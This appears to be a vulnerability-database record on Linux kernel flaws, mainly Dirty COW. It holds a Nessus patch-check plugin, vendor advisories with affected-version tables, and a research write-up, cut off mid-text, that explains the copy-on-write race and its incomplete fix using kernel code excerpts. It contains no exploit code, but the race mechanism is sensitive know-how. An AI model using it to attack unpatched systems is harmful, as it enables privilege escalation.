"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-raspi2", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic"], "id": "UBUNTU_USN-3508-1.NASL", "href": "https://www.tenable.com/plugins/nessus/105102", "sourceData": "#\n# (C) Tenable Network 
Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3508-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105102);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/04\");\n\n script_cve_id(\"CVE-2017-1000405\", \"CVE-2017-12146\", \"CVE-2017-16939\");\n script_xref(name:\"USN\", value:\"3508-1\");\n\n script_name(english:\"Ubuntu 17.04 : linux, linux-raspi2 vulnerabilities (USN-3508-1) (Dirty COW)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Mohamed Ghannam discovered that a use-after-free vulnerability existed\nin the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle\ncopy-on- write of transparent huge pages. A local attacker could use\nthis to cause a denial of service (application crashes) or possibly\ngain administrative privileges. (CVE-2017-1000405)\n\nYonggang Guo discovered that a race condition existed in the driver\nsubsystem in the Linux kernel. A local attacker could use this to\npossibly gain administrative privileges. (CVE-2017-12146).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3508-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/08\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2020 Canonical, Inc. / NASL script (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(17\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 17.04\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000405\", \"CVE-2017-12146\", \"CVE-2017-16939\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3508-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-4.10.0-1023-raspi2\", pkgver:\"4.10.0-1023.26\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-4.10.0-42-generic\", pkgver:\"4.10.0-42.46\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-4.10.0-42-generic-lpae\", pkgver:\"4.10.0-42.46\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-4.10.0-42-lowlatency\", pkgver:\"4.10.0-42.46\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-generic\", pkgver:\"4.10.0.42.42\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-generic-lpae\", pkgver:\"4.10.0.42.42\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"4.10.0.42.42\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-raspi2\", pkgver:\"4.10.0.1023.24\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.10-generic / linux-image-4.10-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "android": [{"lastseen": "2020-06-22T14:42:11", "bulletinFamily": 
"software", "cvelist": ["CVE-2016-5195"], "description": "Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka \"Dirty COW.\"", "edition": 1, "modified": "2019-07-29T00:00:00", "published": "2016-11-01T00:00:00", "id": "ANDROID:CVE-2016-5195", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2016-5195.html", "title": "CVE-2016-5195", "type": "android", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2020-11-22T06:19:47", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195"], "description": "Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka \u201cDirty COW.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:23am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. 
Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n", "modified": "2020-06-05T00:00:00", "published": "2016-11-10T00:00:00", "id": "AKB:B6D57715-C0B3-48BB-8FDE-F3868F92DB1F", "href": "https://attackerkb.com/topics/E6o7dgfSHk/cve-2016-5195", "type": "attackerkb", "title": "CVE-2016-5195", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2019-08-20T04:37:49", "bulletinFamily": "software", "cvelist": ["CVE-2017-16939"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2018-02-23T17:49:00", "published": "2018-02-23T17:49:00", "id": "F5:K81158013", "href": "https://support.f5.com/csp/article/K81158013", "title": "Linux kernel vulnerability CVE-2017-16939", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-06T22:40:41", "bulletinFamily": "software", "cvelist": ["CVE-2017-8824"], "description": "\nF5 Product Development has assigned ID 712876 (BIG-IP), ID 713060 (Enterprise Manager), and ID 713061 (BIG-IQ and F5 iWorkflow) to this vulnerability. 
Additionally, [F5 iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H15526101 on the **Diagnostics** > **Identified** > **Medium** page.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, FPS, GTM, Link Controller, PEM, WebAccelerator) | 14.x | 14.0.0 | 14.1.0 \n14.0.1.1 | Medium | [6.7](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>) | Linux kernel \n13.x | 13.0.0 - 13.1.1 | 13.1.1.2 \n12.x | 12.1.0 - 12.1.5 | 12.1.5.1 \n11.x | 11.2.1 - 11.6.5 | 11.6.5.1 \nARX | 6.x | None | Not applicable | Not vulnerable2 | None | None \nEnterprise Manager | 3.x | 3.1.1 | None3 | Medium | [6.7](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>) | Linux kernel \nBIG-IQ Centralized Management | 7.x | 7.0.0 | None | Medium | [6.7](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>) | Linux kernel \n6.x | 6.0.0 - 6.1.0 | None \n5.x | 5.0.0 - 5.4.0 | None \n4.x | 4.6.0 | None3 \nBIG-IQ Cloud and Orchestration | 1.x | 1.0.0 | None3 | Medium | [6.7](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>) | Linux kernel \nF5 iWorkflow | 2.x | 2.0.2 - 2.3.0 | None3 | Medium | [6.7](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>) | Linux kernel \nLineRate | 2.x | None | Not applicable | Not vulnerable2 | None | None \nTraffix 
SDC | 5.x | None | Not applicable | Not vulnerable2 | None | None \n4.x | None | Not applicable \n \n1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\n2The specified products contain the affected code. However, F5 identifies the vulnerability status as Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations.\n\n3These products and versions have reached End of Life (EoL).\n\nF5 will not develop a fix for vulnerable products that do not already have a fixed version listed in this article and will not update this table with subsequent vulnerable releases in the associated branches. F5 recommends that you update to more recent, non-vulnerable versions whenever feasible. For more information, refer to [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Fixes introduced in** column. 
If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n * [K48955220: Installing an OPSWAT Endpoint Security update on BIG-IP APM systems (11.4.x and later)](<https://support.f5.com/csp/article/K48955220>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2020-02-10T20:54:00", "published": "2018-05-08T17:43:00", "id": "F5:K15526101", "href": "https://support.f5.com/csp/article/K15526101", "title": "Linux kernel vulnerability CVE-2017-8824", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-06T22:40:20", "bulletinFamily": "software", "cvelist": ["CVE-2016-5195"], "description": "\nF5 Product Development has assigned IDs 624457 and 624459 (BIG-IP), ID 625230 (BIG-IQ), ID 625231 (Enterprise Manager), INSTALLER-2794 (Traffix SDC), and ID 625362 (F5 iWorkflow) to this vulnerability. Additionally, [F5 iHealth](<https://www.f5.com/services/support/support-offerings/big-ip-ihealth-diagnostic-tool>) may list Heuristic H624248 on the **Diagnostics** > **Identified** > **High** page. 
\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP AAM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP AFM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP Analytics | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP APM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP ASM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP DNS | 12.0.0 - 12.1.2 | 13.0.0 \n12.1.2 HF1 | High | Linux kernel \nBIG-IP Edge Gateway | 11.2.1 \n10.2.1 - 10.2.4 | None | High | Linux kernel \nBIG-IP GTM | 11.4.0 - 11.6.1 \n11.2.1 | 11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP Link Controller | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP PEM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP PSM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 
\n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP WebAccelerator | 11.2.1 | None | High | Linux kernel \nBIG-IP WOM | 11.2.1 | None | High | Linux kernel \nBIG-IP WebSafe | 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | 13.0.0 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b12.1.2 HF1 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b11.6.2 \n11.6.1 HF2 | High | Linux kernel \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | 3.1.1 HF8 | High | Linux kernel \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ Device | 4.0.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ ADC | 4.5.0 | None | High | Linux kernel \nBIG-IQ Centralized Management | 5.0.0 - 5.1.0 \n4.6.0 | 5.2.0 - 5.3.0 | High | Linux kernel \nF5 iWorkflow | 2.0.0 - 2.0.1 | 2.0.2 - 2.3.0 | High | Linux kernel \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | High | Linux kernel \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nTraffix SDC | 5.0.0 \n4.0.0 - 4.4.0 | None | Low | Linux kernel \n \nF5 will not develop a fix for vulnerable products that do not already have a fixed version listed in this article, and will not update this table with subsequent vulnerable releases in the associated branches. F5 recommends that you update to more recent, non-vulnerable versions whenever feasible. For more information, refer to [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. 
If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 15.x)](<https://support.f5.com/csp/article/K13123>)\n", "edition": 1, "modified": "2019-09-26T18:41:00", "published": "2016-10-21T18:38:00", "id": "F5:K10558632", "href": "https://support.f5.com/csp/article/K10558632", "title": "Linux privilege-escalation vulnerability CVE-2016-5195 ", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-21T17:25:15", "bulletinFamily": "software", "cvelist": ["CVE-2016-5195"], "edition": 1, "description": "Supplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-10-21T00:00:00", "published": "2016-10-21T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/10/sol10558632.html", "id": "SOL10558632", "type": "f5", "title": "SOL10558632 - Linux privilege-escalation vulnerability (Dirty COW) CVE-2016-5195", "cvss": {"score": 0.0, "vector": "NONE"}}], "seebug": 
[{"lastseen": "2017-12-25T18:30:18", "description": "The \u201cDirty COW\u201d vulnerability ([CVE-2016\u20135195](https://medium.com/r/?url=https%3A%2F%2Fcve.mitre.org%2Fcgi-bin%2Fcvename.cgi%3Fname%3DCVE-2016-5195)) is one of the most hyped and branded vulnerabilities published. Every Linux version from the last decade, including Android, desktops and servers was vulnerable. The impact was vast\u200a\u2014\u200amillions of users could be compromised easily and reliably, bypassing common exploit defenses.\r\n\r\nPlenty of information was published about the vulnerability, but its patch was not analyzed in detail.\r\n\r\nWe at Bindecy were interested to study the patch and all of its implications. Surprisingly, despite the enormous publicity the bug had received, we discovered that the patch was incomplete.\r\n\r\n### \"Dirty COW\" recap\r\nFirst, we need a full understanding of the original Dirty COW exploit. We\u2019ll assume basic understanding of the Linux memory manager. We won\u2019t recover the original gory details, as talented people have [already done](https://medium.com/r/?url=https%3A%2F%2Fchao-tic.github.io%2Fblog%2F2017%2F05%2F24%2Fdirty-cow) so.\r\n\r\nThe original vulnerability was in the `get_user_pages` function. This function is used to get the physical pages behind virtual addresses in user processes. The caller has to specify what kind of actions he intends to perform on these pages (touch, write, lock, etc\u2026), so the memory manager could prepare the pages accordingly. Specifically, when planning to perform a write action on a page inside a private mapping, the page may need to go through a COW (Copy-On-Write) cycle\u200a\u2014\u200athe original, \u201cread-only\u201d page is copied to a new page which is writable. 
The original page could be \u201cprivileged\u201d\u200a\u2014\u200ait could be mapped in other processes as well, and might even be written back to the disk after it\u2019s modified.\r\n\r\nLet\u2019s now take a look at the relevant code in `__get_user_pages`:\r\n```\r\n\r\nstatic long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,\r\n unsigned long start, unsigned long nr_pages,\r\n unsigned int gup_flags, struct page **pages,\r\n struct vm_area_struct **vmas, int *nonblocking)\r\n{\r\n // ...\r\n do {\r\n struct page *page;\r\n unsigned int foll_flags = gup_flags;\r\n // ...\r\n vma = find_extend_vma(mm, start);\r\n // ... \r\n \r\nretry:\r\n // ...\r\n cond_resched();\r\n page = follow_page_mask(vma, start, foll_flags, &page_mask);\r\n if (!page) {\r\n int ret;\r\n ret = faultin_page(tsk, vma, start, &foll_flags,\r\n nonblocking);\r\n switch (ret) {\r\n case 0:\r\n goto retry;\r\n case -EFAULT:\r\n case -ENOMEM:\r\n case -EHWPOISON:\r\n return i ? i : ret;\r\n case -EBUSY:\r\n return i;\r\n case -ENOENT:\r\n goto next_page;\r\n }\r\n BUG();\r\n }\r\n // ...\r\n \r\nnext_page:\r\n // ...\r\n nr_pages -= page_increm;\r\n } while (nr_pages);\r\n return i;\r\n}\r\n```\r\n\r\nThe `while` loop\u2019s goal is to fetch each page in the requested page range. Each page has to be faulted in until our requirements are satisfied\u200a\u2014\u200athat\u2019s what the `retry` label is used for.\r\n\r\n`follow_page_mask`\u2019s role is to scan the page tables to get the physical page for the given address (while taking into account the PTE permissions), or fail in case the request can\u2019t be satisfied. During `follow_page_mask`\u2019s operation the PTE\u2019s spinlock is acquired\u2014 this guarantees the physical page won\u2019t be released before we grab a reference.\r\n\r\n`faultin_page` requests the memory manager to handle the fault in the given address with the specified permissions (also under the PTE\u2019s spinlock). 
Note that after a successful call to `faultin_page` the lock is released\u200a\u2014\u200ait\u2019s not guaranteed that `follow_page_mask` will succeed in the next retry; another piece of code might have messed with our page.\r\n\r\nThe original vulnerable code resided at the end of faultin_page:\r\n```\r\nif ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))\r\n *flags &= ~FOLL_WRITE;\r\n```\r\n\r\nThe reason for removing the `FOLL_WRITE` flag is to take into account the case where the `FOLL_FORCE` flag is applied on a read-only VMA (when the `VM_MAYWRITE` flag is set in the VMA). In that case, the `pte_maybe_mkwrite` function won\u2019t set the write bit; however, the faulted-in page is indeed ready for writing.\r\n\r\nIf the page went through a COW cycle (marked by the `VM_FAULT_WRITE` flag) while performing faultin_page and the VMA is not writable, the `FOLL_WRITE` flag is removed from the next attempt to access the page\u200a\u2014\u200aonly read permissions will be requested.\r\n\r\nIf the first `follow_page_mask` fails because the page was read-only or not present, we\u2019ll try to fault it in. Now let\u2019s imagine that during that time, until the next attempt to get the page, we\u2019ll get rid of the COW version (e.g. by using `madvise(MADV_DONTNEED)`).\r\n\r\nThe next call to `faultin_page` will be made without the `FOLL_WRITE` flag, so we\u2019ll get the read-only version of the page from the page cache. Now, the next call to `follow_page_mask` will also happen without the `FOLL_WRITE` flag, so it will return the privileged read-only page\u200a\u2014\u200aas opposed to the caller\u2019s original request for a writable version of the page.\r\n\r\nBasically, the aforementioned flow is the Dirty COW vulnerability\u200a\u2014\u200ait allows us to write to the read-only privileged version of a page. 
The following fix was introduced in `faultin_page`:\r\n```\r\nif ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))\r\n *flags |= FOLL_COW; // Instead of *flags &= ~FOLL_WRITE;\r\n```\r\n\r\n\r\nAnd a new function, which is called by `follow_page_mask`, was added:\r\n```\r\n/*\r\n * FOLL_FORCE can write to even unwritable pte's, but only\r\n * after we've gone through a COW cycle and they are dirty.\r\n */\r\nstatic inline bool can_follow_write_pte(pte_t pte, unsigned int flags)\r\n{\r\n\treturn pte_write(pte) ||\r\n\t\t((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));\r\n}\r\n```\r\n\r\n\r\n\r\nInstead of reducing the requested permissions, `get_user_pages` now remembers the fact that we went through a COW cycle. On the next iteration, we would be able to get a read-only page for a write operation only if the `FOLL_FORCE` and `FOLL_COW` flags are specified and the PTE is marked as dirty.\r\n\r\nThis patch assumes that the read-only privileged copy of a page will never have a PTE pointing to it with the dirty bit on\u200a\u2014\u200aa reasonable assumption\u2026 or is it?\r\n\r\n### Transparent Huge Pages (THP)\r\nNormally, Linux uses 4096-byte pages. In order to enable the system to manage large amounts of memory, we can either increase the number of page table entries, or use larger pages. We focus on the second method, which is implemented in Linux by using [huge pages](https://medium.com/r/?url=https%3A%2F%2Fgithub.com%2Florenzo-stoakes%2Flinux-vm-notes%2Fblob%2Fmaster%2Fsections%2Ftrans-huge-pages.md).\r\n\r\nA huge page is 2MB long. One of the ways to utilize this feature is through the Transparent Huge Pages mechanism. While there are other ways to get huge pages, they are outside of our scope.\r\n\r\nThe kernel will attempt to satisfy relevant memory allocations using huge pages. THP are swappable and \u201cbreakable\u201d (i.e. 
can be split into normal 4096-byte pages), and can be used in anonymous, shmem and tmpfs mappings (the latter two are true only in newer kernel versions).\r\n\r\nUsually (depending on the compilation flags and the machine configuration) the default THP support is for anonymous mappings only. Shmem and tmpfs support can be turned on manually, and in general THP support can be turned on and off while the system is running by writing to some of the kernel\u2019s special files.\r\n\r\nAn important optimization opportunity is to coalesce normal pages into huge pages. A special daemon called khugepaged scans constantly for possible candidate pages that could be merged into huge pages. Obviously, to be a candidate, a VMA must cover a whole, aligned 2MB memory range.\r\n\r\nTHP is implemented by turning on the `_PAGE_PSE` bit of the PMD (Page Middle Directory, one level above the PTE level). The PMD thus points to a 2MB physical page, instead of a directory of PTEs. Each time the page tables are scanned, the PMDs must be checked with the `pmd_trans_huge` function, so we can decide whether the PMD points to a pfn or a directory of PTEs. On some architectures, huge PUDs (Page Upper Directory) exist as well, resulting in 1GB pages.\r\n\r\nTHP is supported since kernel 2.6.38. On most Android devices the THP subsystem is not enabled.\r\n\r\n### The bug\r\nDelving into the Dirty COW patch code that deals with THP, we can see that the same logic of `can_follow_write_pte` was applied to huge PMDs. 
